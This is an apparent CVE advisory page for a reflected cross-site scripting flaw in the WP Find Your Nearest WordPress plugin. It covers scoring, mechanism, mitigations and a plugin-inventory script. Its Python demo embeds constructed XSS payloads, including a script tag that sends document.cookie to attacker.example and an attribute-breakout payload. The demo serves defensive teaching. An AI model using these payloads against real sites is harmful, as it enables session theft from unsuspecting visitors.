Cyber Resilience

CVE-2025-25161

Severity: High
Published: 03 March 2025
Modified: 23 April 2026
KEV Added: not listed
CVSS v3.1: 7.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L)
EPSS: 0.0035 (57.6th percentile)
Risk Priority: 14 (weighted 60% EPSS, 20% KEV, 20% CVSS)

Summary

CVE-2025-25161 is a high-severity Cross-site Scripting (CWE-79) vulnerability. Its CVSS base score is 7.1 (High).

Operationally, exploitation maps to the MITRE ATT&CK technique Exploitation for Client Execution (T1203). Its EPSS score places it in the top 42.4% of CVEs by exploit likelihood, and it is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-15 (Information Output Filtering) and SI-2 (Flaw Remediation).

Deeper analysis

CVE-2025-25161 is an Improper Neutralization of Input During Web Page Generation vulnerability, classified as Reflected Cross-Site Scripting (XSS) under CWE-79, in the WP Find Your Nearest WordPress plugin developed by SocialEvolution. It affects all versions of the plugin up to and including 0.3.1; no lower bound is specified. Published on March 3, 2025, it carries a CVSS v3.1 base score of 7.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L): network reachable, low attack complexity, no privileges required, user interaction required, and changed scope (the injected script runs in the victim's browser, not in the vulnerable server component), with low confidentiality, integrity and availability impact.

An unauthenticated remote attacker exploits a reflected XSS flaw by crafting a link or form submission that carries the payload in a request parameter. When a victim opens the link or submits the form, the plugin echoes the parameter into the generated page without neutralizing it, and the injected JavaScript executes in the victim's browser within the origin of the vulnerable site. The CVSS vector rates each impact as low: disclosure of data the script can reach in that origin (for example session tokens in cookies not protected by the HttpOnly flag, or page content), modification of data through requests made with the victim's session, and limited availability impact. Because the payload is reflected rather than stored, each victim has to be lured individually.
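To make the mechanism concrete, here is an added Python example (not code from the plugin or from Patchstack) that mimics a page reflecting a search parameter in three ways: raw concatenation (CWE-79), escaping of angle brackets only, and full context-aware escaping equivalent to WordPress's esc_attr()/esc_html(). The /find path, the q parameter and both attacker URLs are constructed for illustration and are not the plugin's real endpoint or known payloads. A parser-based probe shows why escaping only `<` and `>` is not enough when the value lands inside an attribute.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed attacker links (assumptions for illustration; the real plugin's
# endpoint and parameter name are not given in the advisory).
# 1) tag injection: works when the value lands in a text node unescaped
TAG_INJECTION_URL = (
    "https://victim.example/find?q="
    "%3Cscript%3Enew%20Image().src%3D%27https://attacker.example/%3F%27"
    "%2Bdocument.cookie%3C/script%3E"
)
# 2) attribute breakout: needs no '<' at all, only an unescaped double quote
ATTR_BREAKOUT_URL = (
    "https://victim.example/find?q="
    "%22%20autofocus%20onfocus%3D%22alert(document.domain)%22%20x%3D%22"
)


def reflected_param(url, name="q"):
    """Decode the query parameter the way a server-side framework would."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get(name, [""])[0]


def render_vulnerable(search):
    # CWE-79: the untrusted value is concatenated into an attribute and a text node
    return (f'<input type="search" name="q" value="{search}">'
            f'<p>Results near "{search}"</p>')


def render_text_only_escaped(search):
    # Common half-fix: escapes < > & but leaves quotes alone. Safe in the <p>,
    # still exploitable inside the value="..." attribute.
    safe = html.escape(search, quote=False)
    return (f'<input type="search" name="q" value="{safe}">'
            f'<p>Results near "{safe}"</p>')


def render_hardened(search):
    # Encodes < > & " ' so the value can neither open a tag nor close the
    # attribute; equivalent to WordPress esc_attr()/esc_html().
    safe = html.escape(search, quote=True)
    return (f'<input type="search" name="q" value="{safe}">'
            f'<p>Results near "{safe}"</p>')


class _Probe(HTMLParser):
    """Records what a browser-like parser actually sees in the generated markup."""

    def __init__(self):
        super().__init__()
        self.script_tags = 0
        self.input_attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        elif tag == "input":
            self.input_attrs.update(attrs)


def probe(markup):
    p = _Probe()
    p.feed(markup)
    p.close()
    return {
        "script_tags": p.script_tags,
        # an injected event handler means the attacker escaped the attribute context
        "event_handler": "onfocus" in p.input_attrs,
    }


def injectable(render):
    """True if either constructed payload reaches the parser as a script tag
    or as an attribute the attacker did not start out in."""
    for url in (TAG_INJECTION_URL, ATTR_BREAKOUT_URL):
        result = probe(render(reflected_param(url)))
        if result["script_tags"] or result["event_handler"]:
            return True
    return False


if __name__ == "__main__":
    for fn in (render_vulnerable, render_text_only_escaped, render_hardened):
        print(f"{fn.__name__:28s} injectable={injectable(fn)}")
```

The probe reports the raw rendering and the angle-bracket-only rendering as injectable (the second one through the attribute breakout alone), and the fully escaped rendering as not injectable. The lesson for plugin code is the one WordPress documents: choose the escaping function by output context and apply it at the point of output, not somewhere upstream.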

The Patchstack advisory at https://patchstack.com/database/Wordpress/Plugin/wp-find-your-nearest/vulnerability/wordpress-globalquran-plugin-1-0-csrf-to-settings-change-vulnerability-2?_s_id=cve provides details on the vulnerability (note that the slug of that URL names a different plugin, so confirm you have landed on the WP Find Your Nearest entry). It recommends updating to a patched version of WP Find Your Nearest where one is available, or removing the plugin if none exists. Practitioners should inventory their WordPress installs for the plugin directory wp-content/plugins/wp-find-your-nearest and, in the interim, deploy a Content Security Policy that disallows inline scripts; a CSP limits what an injected script can do but does not remove the flaw.
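For the inventory step, the following added Python script (not from Patchstack or the plugin vendor) walks one or more filesystem roots for wp-content/plugins/wp-find-your-nearest, reads the Version: header the way WordPress does, and flags anything at or below 0.3.1. The sample installs it creates under a temporary directory, the main-file name wp-find-your-nearest.php and the later version 0.3.2 are constructed for the demonstration; the advisory itself names no fixed version.

```python
import re
import tempfile
from pathlib import Path

AFFECTED_SLUG = "wp-find-your-nearest"
LAST_VULNERABLE = "0.3.1"          # advisory: affected "through <= 0.3.1"

# WordPress reads plugin metadata from a comment header such as
#   /*
#   Plugin Name: WP Find Your Nearest
#   Version: 0.3.1
#   */
VERSION_RE = re.compile(r"^[ \t*]*Version:[ \t]*([0-9][0-9A-Za-z.\-]*)", re.M | re.I)


def version_tuple(version):
    """'0.3.1' -> (0, 3, 1). Compares numeric components only, so 0.3.10 > 0.3.1
    and a suffix such as '-beta' is dropped rather than compared as text."""
    parts = []
    for piece in re.split(r"[.\-]", version):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def is_affected(version, last_vulnerable=LAST_VULNERABLE):
    return version_tuple(version) <= version_tuple(last_vulnerable)


def plugin_version(plugin_dir):
    """Version header from the first PHP file in the plugin directory that has one.
    Only the first 8 KiB is inspected, matching how WordPress itself reads headers."""
    for php in sorted(Path(plugin_dir).glob("*.php")):
        m = VERSION_RE.search(php.read_text(errors="replace")[:8192])
        if m:
            return m.group(1)
    return None


def scan_sites(roots):
    """Walk each root for wp-content/plugins/<slug> and classify what is installed.
    An install whose version cannot be read is reported as affected so it gets reviewed."""
    findings = []
    for root in roots:
        for plugin_dir in Path(root).glob(f"**/wp-content/plugins/{AFFECTED_SLUG}"):
            version = plugin_version(plugin_dir)
            findings.append({
                "path": str(plugin_dir),
                "version": version,
                "affected": version is None or is_affected(version),
            })
    return sorted(findings, key=lambda f: f["path"])


def build_sample_tree():
    """Constructed sample data (assumption, not real installs): two WordPress sites,
    one still on 0.3.1 and one on a hypothetical later version 0.3.2."""
    root = Path(tempfile.mkdtemp(prefix="wp-scan-"))
    for site, version in (("site-a", "0.3.1"), ("site-b", "0.3.2")):
        d = root / site / "wp-content" / "plugins" / AFFECTED_SLUG
        d.mkdir(parents=True)
        (d / "wp-find-your-nearest.php").write_text(
            "<?php\n/*\nPlugin Name: WP Find Your Nearest\n"
            f"Version: {version}\n*/\n"
        )
    # an unrelated plugin that must not be reported
    other = root / "site-b" / "wp-content" / "plugins" / "hello-dolly"
    other.mkdir(parents=True)
    (other / "hello.php").write_text(
        "<?php\n/*\nPlugin Name: Hello Dolly\nVersion: 1.7.2\n*/\n"
    )
    return root


if __name__ == "__main__":
    for finding in scan_sites([build_sample_tree()]):
        flag = "AFFECTED" if finding["affected"] else "ok"
        print(f"{flag:8s} {finding['version']!s:8s} {finding['path']}")
```

Point it at the document roots of your web servers (or at a mounted backup) instead of the sample tree. Where WP-CLI is available on the host, `wp plugin list` gives the same version information per site and is the quicker route for a handful of installs; the filesystem walk is for fleets where you cannot run PHP on every box.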

Vulnerability details

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SocialEvolution WP Find Your Nearest wp-find-your-nearest allows Reflected XSS. This issue affects WP Find Your Nearest: from n/a through <= 0.3.1.

CWE(s)

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Related Threats

MITRE ATT&CK Enterprise Techniques

T1203 Exploitation for Client Execution (tactic: Execution)
Adversaries may exploit software vulnerabilities in client applications to execute code.
T1204.001 Malicious Link (tactic: Execution)
An adversary may rely upon a user clicking a malicious link in order to gain execution.
T1539 Steal Web Session Cookie (tactic: Credential Access)
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials.
Why these techniques?

Reflected XSS yields arbitrary JavaScript execution in the victim's browser once the victim follows a crafted link (T1203 Exploitation for Client Execution, T1204.001 Malicious Link), and that script can read session cookies or tokens accessible to the page (T1539 Steal Web Session Cookie).

Confidence: MEDIUM · MITRE ATT&CK Enterprise v19.0

CVEs Like This One

CVE-2025-23587 (shared CWE-79)
CVE-2025-24646 (shared CWE-79)
CVE-2025-26584 (shared CWE-79)
CVE-2025-23602 (shared CWE-79)
CVE-2025-26536 (shared CWE-79)
CVE-2025-24599 (shared CWE-79)
CVE-2025-23619 (shared CWE-79)
CVE-2025-23540 (shared CWE-79)
CVE-2025-24708 (shared CWE-79)
CVE-2025-23475 (shared CWE-79)

Affected Assets

SocialEvolution WP Find Your Nearest (plugin slug wp-find-your-nearest), all versions up to and including 0.3.1.

Mitigating Controls (NIST 800-53 r5)

SI-2 (Flaw Remediation), prevent
Directly requires identifying, reporting, and correcting the specific reflected XSS flaw in the WP Find Your Nearest plugin through patching or removal.

SI-15 (Information Output Filtering), prevent
Mandates filtering information outputs to neutralize untrusted input during web page generation, preventing arbitrary JavaScript execution in reflected XSS attacks.

prevent
Requires validation of user inputs to block or sanitize malicious payloads that could be reflected as executable scripts in the victim's browser.

References

Patchstack advisory: https://patchstack.com/database/Wordpress/Plugin/wp-find-your-nearest/vulnerability/wordpress-globalquran-plugin-1-0-csrf-to-settings-change-vulnerability-2?_s_id=cve